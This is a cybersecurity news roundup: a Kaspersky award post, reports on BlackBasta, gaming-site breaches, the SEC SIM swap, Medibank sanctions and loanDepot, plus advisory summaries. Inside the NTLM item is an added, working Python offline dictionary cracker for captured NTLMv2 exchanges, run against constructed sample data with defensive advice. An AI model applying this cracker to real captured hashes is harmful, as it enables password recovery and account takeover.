Great news! The latest generation of our security solutions for home users has received a Product of the Year 2023 award. It's the result of extensive multi-stage testing conducted by the independent European test lab AV-Comparatives over the course of 2023, which examined and evaluated 16 security solutions from popular vendors. Here's what this victory means, what it consists of, how the testing was done, and what other awards we picked up.

Our Kaspersky Standard security solution was named Product of the Year 2023 after in-depth testing by AV-Comparatives

What does Product of the Year actually mean?

The tests were carried out on our basic security solution for home users, Kaspersky Standard, but its outstanding results apply equally to all our endpoint products. The reason is simple: all our solutions use the same detection and protection technology stack that was thoroughly tested by AV-Comparatives. Thus, this top award, Product of the Year 2023, applies equally to our more advanced home protection solutions (Kaspersky Plus and Kaspersky Premium) and also to our business products, such as Kaspersky Endpoint Security for Business and Kaspersky Small Office Security.

So what does it take to earn the coveted Product of the Year title? A security solution needs to take part in seven tests throughout the year and consistently achieve the highest Advanced+ score in each of them. These tests examine the quality of protection against common threats and targeted attacks, resistance to false positives, and the impact on overall system performance. This golden triad of metrics forms the basis of a comprehensive evaluation of a security solution's performance.

That the testing is continuous over the course of a year is important, since malware developers hardly sit around twiddling their thumbs: new threats emerge all the time, and existing ones evolve with breathtaking speed. Consequently, security solution developers must keep moving forward at the same pace. That's why assessing performance at a single point in time is misleading; getting a true picture of a solution's effectiveness requires extensive and repeated testing all year long. Which is precisely what AV-Comparatives does.

AV-Comparatives examined 16 security solutions from the largest vendors in its tests.
Winning such a significant contest clearly demonstrates the highest level of protection provided by our products. The seven rounds of tests, some of which individually lasted several months, that our protection took part in to eventually win the Product of the Year award were the following:

March 2023: Malware Protection Test, spring series
April 2023: Performance Test, spring series
February–May 2023: Real-World Protection Test, first series
September 2023: Malware Protection Test, autumn series
September–October 2023: Advanced Threat Protection Test
October 2023: Performance Test, autumn series
July–October 2023: Real-World Protection Test, second series

To earn the AV-Comparatives Product of the Year title, a security solution needs to get the highest score in each stage of testing. And our product rose to the challenge: in each of the tests listed above, Kaspersky Standard scooped the top score, Advanced+.

The Product of the Year award went to Kaspersky Standard based on top marks in all seven of a series of AV-Comparatives tests in 2023

How AV-Comparatives tests security solutions

Now for a closer look at AV-Comparatives' testing methodology. The different tests evaluate different capabilities of the security solutions taking part.

Malware Protection Test

This test examines a solution's ability to detect prevalent malware. In the first phase of the test, malicious files (AV-Comparatives uses just over 10,000 malware samples) are written to the drive of the test computer, after which they're scanned by the tested security solution, at first offline, without internet access, and then online. Any malicious files that were missed by the protective solution during static scanning are then run. If the product fails to prevent or reverse all the malware's actions within a certain time, the threat is considered to have been missed. Based on the number of threats missed, AV-Comparatives assigns a protection score to the solution.
Also during this test, the security solutions are evaluated for false positives. High-quality protection shouldn't mistakenly flag clean applications or safe activities. After all, if one cries wolf too often, the user will begin to ignore the warnings, and sooner or later malware will strike. Not to mention that false alarms are extremely annoying. The final score is based on these two metrics. An Advanced+ score means reliable protection with a minimum of false positives.

Real-World Protection Test

This test focuses on protection against the most current web-hosted threats at the time of testing. Malware (both malicious files and web exploits) is out there on the internet, and the solutions being tested can deploy their whole arsenals of built-in security technologies to detect the threats. Detection and blocking of a threat, with subsequent rollback of all changes, can occur at any stage: when opening a dangerous link, when downloading and saving a malicious file, or when the malware is already running. In any of these cases, the solution is marked a success. As before, both the number of missed threats and the number of false positives are taken into account for the final score. Advanced+ is awarded to products that minimize both these metrics.

Advanced Threat Protection Test

This test assesses the ability of the solution to withstand targeted attacks. To this end, AV-Comparatives designs and launches 15 attacks that simulate real-world ones, using diverse tools, tactics and techniques, with various initial conditions and along different vectors. A test for false positives is also carried out. This checks whether the solution blocks any potentially risky, but not necessarily dangerous, activity (such as opening email attachments), which increases the level of protection at the expense of user convenience and productivity.

Performance Test

Another critical aspect of a security solution's evaluation is its impact on system performance.
Here, the lab engineers emulate a number of typical user scenarios to evaluate how the solution under test affects their run time. The list of scenarios includes:

Copying and recopying files
Archiving and unpacking files
Installing and uninstalling programs
Starting and restarting programs
Downloading files from the internet
Web browsing

Additionally, system-performance drops are measured against the PCMark 10 benchmark. Based on these measurements, AV-Comparatives calculates the total impact of each solution on system performance (the lower this metric, the better), then applies a statistical model to assign a final score to the products: Advanced+, Advanced, Standard, Tested, Not passed. Naturally, Advanced+ means minimal impact on computer performance.

What other AV-Comparatives awards did Kaspersky pick up in 2023?

Besides Kaspersky Standard being named Product of the Year, our products received several other important awards based on AV-Comparatives tests in 2023:

Real World Protection 2023 Silver
Malware Protection 2023 Silver
Advanced Threat Protection Consumer 2023 Silver
Best Overall Speed 2023 Bronze
Lowest False Positives 2023 Bronze
Certified Advanced Threat Protection 2023
Strategic Leader 2023 for Endpoint Prevention and Response Test 2023
Approved Enterprise Business Security 2023

We have a long-standing commitment to using independent research by recognized test labs to impartially assess the quality of our solutions and to address identified weaknesses when upgrading our technologies. For 20 years now, the independent test lab AV-Comparatives has been putting our solutions through their paces, confirming time and again our quality of protection and conferring a multitude of awards. Throughout those two decades, we've received the highest Product of the Year award seven times; no other vendor of security solutions has had such a number of victories.
And if we add to this all the Outstanding Product and Top Rated awards we've also received over the years, it turns out that Kaspersky security solutions have received top recognitions from AV-Comparatives experts a full 16 times in 20 years! Besides this, AV-Comparatives has also awarded us:

57 Gold, Silver, and Bronze awards in a variety of specialized tests
Two consecutive Strategic Leader awards in 2022 and 2023, for high results in protection against targeted attacks by the Kaspersky EDR Expert solution
Confirmation of 100% anti-tampering protection (Anti-Tampering Test 2023)
Confirmation of 100% protection against LSASS attacks (LSASS Credential Dumping Test 2022)
Confirmation of top-quality Network Array Storage protection (Test of AV solution for Storage)
and numerous other awards

Learn more about the awards we've received, and check out our performance dynamics in independent tests from year to year by visiting our TOP 3 Metrics page.
The BlackBasta ransomware group has claimed two new victims, Southern Water and Asahi Glass Co., adding them to its dark web portal. The cybercriminals, however, have not disclosed details about the extent of the attack, the compromised data, or the motive behind the intrusion. What adds to the urgency is the ransomware group's ominous deadline for data exposure. Southern Water faces a countdown of 6 days, 18 hours, 43 minutes, and 50 seconds, while Asahi Glass Co. has a ticking clock set for 7 days, 20 hours, 39 minutes, and 54 seconds. This timeframe raises serious concerns about potential data breaches and the urgency of a response.

A check of the targeted companies' official websites found them fully functional, which casts doubt on the authenticity of the ransomware group's claims. To verify this, The Cyber Express team reached out to Southern Water and Asahi Glass Co. for official statements. As of writing this report, no official response has been received, leaving the claim unverified.

Recurrence of BlackBasta Ransomware Attacks

This recent incident follows BlackBasta's pattern of targeting major entities. In January 2024, the ransomware group expanded its dark web portfolio, adding three more victims to its list of cyberattacks: Graebener Bipolar Plate Technologies in Germany, and NALS Apartment Homes and Leonard's Express in the United States. Notably, BlackBasta garnered attention in May 2023 when it targeted Viking Coca-Cola, one of the largest Coca-Cola bottling partners in the United States. The ransomware attack led to the illicit acquisition of sensitive information, including passports, confidential details, credit card information, and employee records. In March of the same year, Tri Counties Bank, based in Chico, California, found itself on the list of victims. The BlackBasta ransomware group exposed personal information, including U.S. passports and driver's licenses, belonging to the bank's customers. As The Cyber Express closely monitors this unfolding story, we are committed to providing regular updates on any developments related to the companies targeted by the BlackBasta ransomware group. Stay tuned for the latest information on this evolving cyber threat.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Teenpatti.com and Mpl.live (Mobile Premier League), two prominent online gaming platforms in India, may have experienced a data breach. A cybercriminal known as 'roshtosh' has allegedly put up for sale data claimed to be stolen from these platforms. The online gaming data breach, disclosed on January 22, 2024, following the threat activity on January 20, 2024, has raised serious concerns about the security of user information on online gaming sites.

Details of the Online Gaming Data Breach

The threat actor, identified as 'roshtosh', announced the breach on the new BreachForums. According to the perpetrator's claims, the databases of teenpatti.com and mpl.live contained 400,000 and 508,000 records, respectively. These records, reportedly exposed in the breach, include highly sensitive personally identifiable information (PII) such as names, email addresses, phone numbers, and physical addresses of the platforms' users. The attack's impact extends across India and resonates throughout the Asia-Pacific region, underlining the growing threat of cyberattacks in this area.

Online Gaming Data Breach: Implications and the Way Forward

While the alleged data breach at Teenpatti.com and Mpl.live remains unconfirmed, the team at The Cyber Express has contacted both firms for confirmation and additional information regarding the incident. This situation, involving two prominent online gaming platforms, highlights the pressing need for security measures within the digital domain, especially in sectors like gaming that manage large volumes of personal user data. There is a critical need for enhanced security protocols and vigilant monitoring to safeguard user data against such malicious activities. In light of the reported data breach concerning Teenpatti.com and Mpl.live, it is crucial for users of these online gaming platforms to exercise increased caution and vigilance.

Online Gaming Cyberattacks: A Worrying Trend

The gaming industry has experienced a significant rise in cyberattacks, with over 4 million attacks targeting gamers between July 2022 and July 2023.
These attacks predominantly affected the mobile gaming community, which comprises a substantial portion of the global gaming population. The attacks were diverse in nature, with popular games like Minecraft and Roblox being employed as bait. For instance, Minecraft players in Indonesia were targeted by a Trojan.AndroidOS.Pootel.a attack, while Roblox users on Android faced threats from SpyNote, a spy Trojan with extensive spying capabilities, including keylogging and screen recording. Phishing and counterfeit distribution pages have also posed significant threats to gamers. These malicious pages often masquerade as popular games and are distributed through third-party websites offering pirated versions, leading to harmful or unrelated content being downloaded by unsuspecting users. In addition to these targeted attacks, the gaming industry has also been affected by sophisticated ransomware groups like BlackCat, known for their double extortion attacks. This group has been particularly active, leveraging various methods to infiltrate networks, including exploiting known vulnerabilities and social engineering. The ransomware-as-a-service (RaaS) model, as used by BlackCat, allows these groups to scale their operations significantly. Another concerning trend is the rise of double extortion and encryption-less ransomware attacks, where data is exfiltrated and threatened with publication if ransoms are not paid. The impact of these attacks on users is multifold. In addition to the immediate threat of personal data exposure and financial loss, there is a long-term erosion of trust in the gaming platforms. The attacks highlight the critical need for robust cybersecurity measures within the gaming community to protect against such sophisticated threats. Gamers are advised to download games only from official stores and to be cautious of phishing campaigns and unfamiliar sources.
Employing strong, reliable security solutions and staying updated on the latest cybersecurity practices are essential steps in safeguarding against these threats.
In this episode of The Security Ledger Podcast (#255), host Paul Roberts interviews Niels Provos of Lacework about his mission to use EDM to teach people about cybersecurity. The post Episode 255: EDM, Meet CDM – Cyber Dance Music with Niels Provos appeared first on The Security Ledger with Paul F. Roberts.
The tantalizing promise of true artificial intelligence, or at least decent machine learning, has whipped into a gallop large organizations not built for speed.
The new iOS update includes Stolen Device Protection which limits what users can do on their iPhones when away from known locations (such as home or work), to prevent criminals from making unauthorized changes.
The cyberattackers behind the traffic redirection system (TDS) inject websites with malicious scripts, have control over thousands of servers worldwide, and have ramped up efforts to avoid detection.
Ukraine's tactical and strategic cybersecurity approach in the intense warfare environment offers a blueprint for organizations aiming to fortify their cyber defenses.
The malware substitutes genuine apps with compromised versions, enabling attackers to pilfer credentials and recovery phrases, thus gaining access to wallets and their contents.
Organizations with outdated Confluence instances should treat them as potentially compromised, look for signs of exploitation, perform a thorough cleanup, and update to a safe version to mitigate the risk.
The infection chain begins with deceptive emails and websites, ultimately leading to the activation of the Chae$ 4.1 malware, highlighting the importance of cautious online behavior.
Australia has used its significant cyber incidents sanctions regime for the first time against a Russian individual named Aleksandr Gennadievich Ermakov, who is linked to the 2022 cyber attack on health insurer Medibank Private.
Malicious Python packages on PyPI, such as nigpal, figflix, and seGMM, have been identified, with payloads designed to steal sensitive information from victims' devices, particularly targeting Windows users.
The Criminal Court in Thailand has ordered the blocking of the website 9near.org, which claimed to have accessed the personal information of 55 million Thai citizens from vaccine registration records.
Bulletproof hosting (BPH) providers operate in a complex and persistent manner, making it challenging for defenders to permanently shut them down. Blocking BPH providers can effectively disrupt malicious activities early in the kill chain.
Attackers can use stolen NTLM v2 hashes for offline brute-force attacks or authentication relay attacks, potentially compromising user accounts and gaining unauthorized access.
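The offline attack mentioned in the item above, as an added example that is not code from the article or from any tool it covers. It implements MD4 in pure Python (OpenSSL 3 builds of hashlib often lack md4), derives the NT hash and the NTLMv2 key as specified in MS-NLMP, and runs a dictionary attack against a constructed "capture". The user name, domain, server challenge, blob contents, password and word list are all constructed for the demonstration; the relay variant is not shown.

```python
"""Why a captured NTLMv2 exchange can be cracked offline.

Added example, not from the article above. The only secret in an NTLMv2
exchange is the NT hash of the password; the server challenge, the client
blob and NTProofStr all travel in the clear, so an attacker who captured
them (or coerced a host to authenticate to a rogue server) can test
candidate passwords without touching the real server again.
"""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


# Per MD4 round: mixing function, additive constant, message-word order, shift per step.
_MD4_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
     list(range(16)), (3, 7, 11, 19)),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
     [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
     [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: pad with 0x80, zeros and the 64-bit little-endian bit length,
    then run three 16-step rounds over each 64-byte block."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for func, const, order, shifts in _MD4_ROUNDS:
            for j in range(16):
                i = (-j) % 4  # the updated word cycles a, d, c, b
                v[i] = _rotl((v[i] + func(v[(i + 1) % 4], v[(i + 2) % 4], v[(i + 3) % 4])
                              + x[order[j]] + const) & _MASK, shifts[j % 4])
        state = [(s + t) & _MASK for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The NT hash: MD4 over the UTF-16LE encoded password (NTOWFv1)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"),
                    hashlib.md5).digest()


def nt_proof(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob); sent on the wire in the clear."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def crack_ntlmv2(user, domain, server_challenge, blob, captured_proof, wordlist):
    """Offline dictionary attack: recompute NTProofStr for each guess from captured
    values only. Returns the matching password or None."""
    for candidate in wordlist:
        guess = nt_proof(ntlmv2_key(candidate, user, domain), server_challenge, blob)
        if hmac.compare_digest(guess, captured_proof):
            return candidate
    return None


# Constructed sample capture (not from any real incident): what a sniffer or a rogue
# SMB/HTTP listener would record for one NTLMv2 authentication.
SAMPLE_USER, SAMPLE_DOMAIN = "jdoe", "CORP"
SAMPLE_SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6                          # RespType, HiRespType, reserved
               + struct.pack("<Q", 133_500_000_000_000_000)        # FILETIME timestamp (constructed)
               + bytes.fromhex("aabbccddeeff0011")                 # client challenge
               + b"\x00" * 4                                       # reserved
               + b"\x02\x00\x08\x00" + "CORP".encode("utf-16le")   # AvPair: MsvAvNbDomainName
               + b"\x00\x00\x00\x00"                               # AvPair: MsvAvEOL
               + b"\x00" * 4)
SAMPLE_PROOF = nt_proof(ntlmv2_key("Winter2024!", SAMPLE_USER, SAMPLE_DOMAIN),
                        SAMPLE_SERVER_CHALLENGE, SAMPLE_BLOB)
SAMPLE_WORDLIST = ["password", "Summer2023!", "Winter2024!", "letmein"]

if __name__ == "__main__":
    print("NT hash('password') =", nt_hash("password").hex())
    print("recovered:", crack_ntlmv2(SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_SERVER_CHALLENGE,
                                     SAMPLE_BLOB, SAMPLE_PROOF, SAMPLE_WORDLIST))
```

Every guess costs one MD4 and two HMAC-MD5 computations and needs no network traffic, which is why the defence is to stop the hashes leaving the host (SMB signing, disabling NTLM where possible, blocking outbound 445) rather than to rely on password length alone.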
The method involves modeling how account access changes as devices, SIM cards, or apps are disconnected from the account ecosystem, providing insights into complex hacking attacks.
The leaked information spans across various companies, organizations, and government agencies globally. The potential impact on consumers is significant, as the leaked data could be used for credential-stuffing attacks and spear-phishing.
A lack of understanding combined with budgetary squeezes are significant obstacles for organizations navigating data privacy and compliance with data protection laws, according to industry body ISACA.
The malware exfiltrates sensitive information including screenshots, cookies, autofill credentials, system info, installed programs, tokens, and sessions, and uploads the collected data to a Discord bot channel.
The agreement will facilitate the sharing of information and experience between the Israel National Cyber Directorate and the Czech National Cyber and Information Security Agency, including the possibility of internships.
While no evidence of compromised digital assets has been found, 66,000 users' names, usernames, and email addresses may have been exposed. Unfortunately, attackers have exploited this data to trick some users into giving away their recovery seeds.
Prosecutors have traced the cryptocurrency wallet used for extortion to the bank account of Aleksanteri Kivimäki, the accused in the psychotherapy clinic data breach case.
The attack method involves exploiting vulnerabilities in default build configurations and targeting abandoned libraries in public repositories through domain name purchases, making it difficult to detect and prevent.
The Securities and Exchange Commission (SEC) experienced an account takeover on Twitter due to a SIM swap attack, where the unauthorized party gained control of the SEC's cell phone number.
The company is working to restore normal business operations, but many online services remain inaccessible even after two weeks. It is still uncertain whether the cyber incident will have a significant impact on LoanDepot's financial condition.
The vulnerability, tracked as CVE-2024-23222, is a type confusion bug in the WebKit browser engine that could lead to arbitrary code execution when processing malicious web content.
The group is testing innovative infection routines that use technical threat research on another North Korean APT group, Kimsuky, as a lure, indicating a new approach to their cyberattacks.
The Black Basta ransomware gang targeted the UK water utility Southern Water, threatening to leak 750 gigabytes of stolen sensitive data, including personal and corporate documents.
AerCap, the world's largest aircraft leasing company, reported a ransomware infection. However, it claims to have not suffered financial losses and has control over its systems.
The BianLian ransomware group has shifted from a double extortion scheme to a focus on extortion without encryption, posing a significant threat to organizations, particularly in the healthcare and manufacturing sectors in the US and Europe.
Ubuntu Security Notice 6595-1 - It was discovered that PyCryptodome had a timing side-channel when performing OAEP decryption. A remote attacker could possibly use this issue to recover sensitive information.
Ubuntu Security Notice 6594-1 - Joshua Rogers discovered that Squid incorrectly handled HTTP message processing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled Helper process management. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled HTTP request parsing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service.
Ubuntu Security Notice 6593-1 - It was discovered that GnuTLS had a timing side-channel when processing malformed ciphertexts in RSA-PSK ClientKeyExchange. A remote attacker could possibly use this issue to recover sensitive information. It was discovered that GnuTLS incorrectly handled certain certificate chains with a cross-signing loop. A remote attacker could possibly use this issue to cause GnuTLS to crash, resulting in a denial of service. This issue only affected Ubuntu 22.04 LTS, Ubuntu 23.04, and Ubuntu 23.10.
Ubuntu Security Notice 6592-1 - It was discovered that libssh incorrectly handled the ProxyCommand and the ProxyJump features. A remote attacker could possibly use this issue to inject malicious code into the command of the features mentioned through the hostname parameter. It was discovered that libssh incorrectly handled return codes when performing message digest operations. A remote attacker could possibly use this issue to cause libssh to crash, obtain sensitive information, or execute arbitrary code.
Logwatch analyzes and reports on Unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and produce a customizable report. It should work right out of the package on most systems.
Red Hat Security Advisory 2024-0332-03 - Updated images are now available for Red Hat Advanced Cluster Security 4.1.6. The updated images include security fixes.
Red Hat Security Advisory 2024-0325-03 - Updated RHEL-7-based Middleware container images are now available. Issues addressed include code execution and deserialization vulnerabilities.
Red Hat Security Advisory 2024-0322-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include a local file inclusion vulnerability.
Red Hat Security Advisory 2024-0320-03 - An update for xorg-x11-server is now available for Red Hat Enterprise Linux 7. Issues addressed include a buffer overflow vulnerability.
The U.S. Securities and Exchange Commission (SEC) has officially confirmed a cyberattack on its X account, revealing that the breach was the result of a SIM-swapping attack on the cell phone number associated with the account. The incident, which occurred on January 9, 2024, initially involved the dissemination of a false announcement suggesting the SEC's approval of spot bitcoin exchange-traded funds (ETFs), causing widespread misinformation.

SIM-Swap Attack Behind SEC X Account Hack

More than 10 days after the breach, the SEC has released an official statement detailing the nature of the attack. The unauthorized party gained control of the SEC cell phone number associated with the SEC X account through a SIM swap attack, a technique in which a person's phone number is transferred to another device without authorization. The SEC clarified that access to the phone number was obtained via the telecom carrier, not through SEC systems. There is no evidence to suggest that the unauthorized party gained access to SEC systems, data, devices, or other social media accounts, according to SEC staff. "SEC staff have not identified any evidence that the unauthorized party gained access to SEC systems, data, devices, or other social media accounts," reads the SEC's official statement.

The SEC is actively coordinating with law enforcement and federal oversight entities, including the SEC's Office of Inspector General, the Federal Bureau of Investigation, the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency, the Commodity Futures Trading Commission, the Department of Justice, and the SEC's own Division of Enforcement. Upon gaining control of the phone number, the unauthorized party reset the password for the @SECGov account. Law enforcement is currently investigating how the party convinced the carrier to change the SIM for the account and how they knew the phone number associated with the account.

Role of Multi-Factor Authentication (MFA)

Notably, multi-factor authentication (MFA) had been enabled on the @SECGov X account in the past but was disabled by X Support in July 2023 at the staff's request due to account access issues. MFA remained disabled until it was re-enabled after the account was compromised on January 9.
MFA is currently enabled for all SEC social media accounts that offer it. The SMS-based MFA previously enabled on the account would not have prevented the breach, because an attacker who controls the phone number also receives the one-time passcodes; MFA configured to use an authenticator app would have been a stronger defence. In that scenario, the authenticator app would have kept the threat actors out of the account even after they successfully reset the password.

This incident marks the latest in a series of cyberattacks on X accounts, with three major X accounts hacked within a week, highlighting the persistent threat landscape. The SEC continues to address these challenges, reinforcing the need for enhanced cybersecurity measures and urging broader adoption of MFA for a more resilient defence against cyber threats.
Australia has taken a historic step by publicly naming and imposing cyber sanctions on a Russian hacker implicated in the 2022 ransomware attack on Medibank. This marks the first instance of Australia using such penalties. The cyber intrusion targeted Medibank, one of Australia's largest private health insurers, compromising personal data from 9.7 million customers, including names, birthdates, medical information, and Medicare numbers. Disturbingly, some of this information was subsequently published on the dark web, as confirmed by Australian authorities. After an exhaustive 18-month investigation, the Australian government disclosed the sanctioned individual as Aleksandr Ermakov, a 33-year-old Russian national allegedly affiliated with the ransomware gang REvil.

Criminal Offense, Cyber Sanctions and Travel Ban

The sanctions make it a criminal offense to provide assets to Ermakov, or to use or deal with his assets, including cryptocurrency wallets or ransom payments. According to the release, the offense carries a potential penalty of up to 10 years' imprisonment, and Ermakov is also subject to a travel ban. Richard Marles, Deputy Prime Minister and Defense Minister, commended the government's relentless efforts to unveil the perpetrators of the Medibank cyberattack. The investigation involved collaborative efforts from various agencies, including the Australian Signals Directorate, the Australian Federal Police, the FBI and NSA in the United States, and GCHQ in the United Kingdom. Private sector cooperation, notably from Microsoft and Medibank, played a crucial role in the investigative process. "The Australian Signals Directorate and the Australian Federal Police have worked tirelessly over the past 18 months to unmask those responsible for the cyberattack on Medibank Private and to ensure Australians are protected from malicious cyber activity," said Deputy Prime Minister, the Hon Richard Marles MP.

Alleged Connection to REvil and Global Impact

The cyberattack on Medibank, initially associated with the REvil group by cybersecurity experts, triggered global cooperation in response. REvil, known for its large-scale attacks, had previously targeted entities in the United States, with a notable incident involving the international meat supplier JBS Foods in 2021.
Abigail Bradshaw, Head of the Australian Cyber Security Centre, acknowledged the dynamic nature of Russian cybercriminal syndicates like REvil. While naming one member does not halt REvil's operations, publicly disclosing Ermakov's identity is expected to hinder his activities, and the sanctions are intended to cut off his finances. Deputy Prime Minister Marles highlighted the substantial impact of revealing Ermakov's identity, making him visible to global agencies and to anyone considering engaging with him. Investigations into other individuals connected to the cyberattack are ongoing. The ramifications of the Medibank breach extended beyond Australia, affecting 1.8 million international customers. The initial ransom demand was set at US$10 million (15 million Australian dollars), later reduced to US$9.7 million, a sum that Medibank refused to pay.

Government's Firm Stance Against Ransom Payments

Minister for Home Affairs and Minister for Cyber Security, Clare O'Neil MP, condemned malicious cyber activity, emphasizing the government's commitment to working with partners to punish individuals attempting cybercrime in the country. The announcement aligns with the 2023-2030 Australian Cyber Security Strategy, which focuses on strengthening defences, collaborating with industry, and breaking the ransomware business model. "The Australian Government condemns malicious cyber activity, and we will work with our partners and do everything in our power to punish individuals who attempt to perpetrate cybercrime in this country," said Minister O'Neil. "Our strong advice to businesses is never to pay the ransom. Paying a ransom does not guarantee sensitive data will be recovered, prevent it from being sold or leaked online or prevent further attacks. It also makes Australia a more attractive target for criminal groups."
LoanDepot, Inc., a leading provider of home lending solutions, has informed its customers that an unauthorized third party accessed sensitive personal information of approximately 16.6 million individuals within its systems in a cyberattack. The loanDepot cyberattack has prompted the company to take swift action, including notifying affected individuals and offering credit monitoring and identity protection services at no cost to them. While the investigation is ongoing, loanDepot has been working with external forensics and security experts to understand the extent of the breach and restore normal operations.

Company Leadership Addresses loanDepot Cyberattack

CEO Frank Martell expressed regret over the incident, acknowledging the increasingly frequent and sophisticated nature of cyberattacks in today’s world.

“Unfortunately, we live in a world where these types of attacks are increasingly frequent and sophisticated, and our industry has not been spared. We sincerely regret any impact to our customers,” said loanDepot CEO Frank Martell in a media statement. He emphasized the company’s dedication to resolving the situation and supporting customers throughout the process.

loanDepot has made substantial progress in restoring its loan origination and loan servicing systems, including the MyloanDepot and Servicing customer portals. Martell further stated, “The entire loanDepot team has worked tirelessly throughout this incident to support our customers, our partners, and each other. I am pleased by our progress in quickly bringing our systems back online and restoring normal business operations.”

Jeff Walsh, President of LDI Mortgage, echoed Martell’s sentiments, highlighting the team’s dedication to customers and expressing pride in overcoming the challenges. He emphasized the company’s commitment to enabling customers nationwide to achieve their financial goals and dreams of homeownership.

“Our customers are at the center of everything we do,” said Jeff Walsh, President of LDI Mortgage. “I’m really proud of our team, and we’re glad to be back to doing what we do best: enabling our customers across the country to achieve their financial goals and dreams of homeownership,” he added.

loanDepot has set up a microsite at loandepot.cyberincidentupdate.com to keep customers, partners, and employees informed, providing additional operational updates as the situation evolves.

Industry Trends and Similar Incidents

On January 8, the company had issued a statement publicly acknowledging the cyberattack and taking specific systems offline to address the situation promptly. It took 10 days for loanDepot to bring back crucial portals, including the Servicing customer portal, HELOC customer portal, MyloanDepot customer portal, and mellohome’s website, albeit with some functionality limitations.

The recent cyberattack on loanDepot follows similar incidents in the mortgage industry. Fidelity National Financial (FNF) disclosed in an 8-K filing with the Securities and Exchange Commission (SEC) that 1.3 million customers had their data exposed in a cyberattack on January 8. In a separate incident, Mr. Cooper, another major mortgage provider, reported a cyberattack affecting nearly 14 million individuals.

As the industry grapples with an increasing number of cyber threats, loanDepot remains committed to securing its systems and mitigating the impact on its customers. The ongoing investigations and collaborative efforts with cybersecurity experts aim to strengthen the company’s defenses against future cyber threats.
Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild. The issue, tracked as CVE-2024-23222, is a type confusion bug that could be exploited by a threat actor to achieve arbitrary code execution when processing maliciously crafted web content. The tech giant said the problem
Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible
Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed. The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm
Cracked software has been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data. Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and
As we enter 2024, Gcore has released its latest Gcore Radar report, a twice-annual publication in which the company releases internal analytics to track DDoS attacks. Gcore’s broad, internationally distributed network of scrubbing centers allows them to follow attack trends over time. Read on to learn about DDoS attack trends for Q3–Q4 of 2023, and what they mean for developing a robust
Conor Brian Fitzpatrick has been sentenced to time served and 20 years of supervised release for his role as the creator and administrator of BreachForums. Fitzpatrick, who went by the online alias "pompompurin," was arrested in March 2023 in New York and was subsequently charged with conspiracy to commit access device fraud and possession of child pornography. He was later released on a $
The threat actors behind ClearFake, SocGholish, and dozens of other actors have established partnerships with another entity known as VexTrio as part of a massive "criminal affiliate program," new findings from Infoblox reveal. The latest development demonstrates the "breadth of their activities and depth of their connections within the cybercrime industry," the company said,
As AI-powered voice cloning turbocharges imposter scams, we sit down with ESET’s Jake Moore to discuss how to hang up on ‘hi-fi’ scam calls – and what the future holds for deepfake detection
Source: www.bleepingcomputer.com – Author: Lawrence Abrams. The U.S. Securities and Exchange Commission confirmed today that its X account was hacked through a SIM-swapping attack on the cell phone number associated with the account. Earlier this month, the SEC’s X account was hacked to issue a fake announcement that the agency had finally approved Bitcoin ETFs on security […] The post SEC confirms X account was hacked in SIM swapping attack – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas. Hackers are using a stealthy method to deliver information-stealing malware to macOS users through DNS records that hide malicious scripts. The campaign appears directed at users of macOS Ventura and later and relies on cracked applications repackaged as PKG files that include a trojan. Attack details: Researchers at cybersecurity company […] The post Cracked macOS apps drain wallets using scripts fetched from DNS records – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
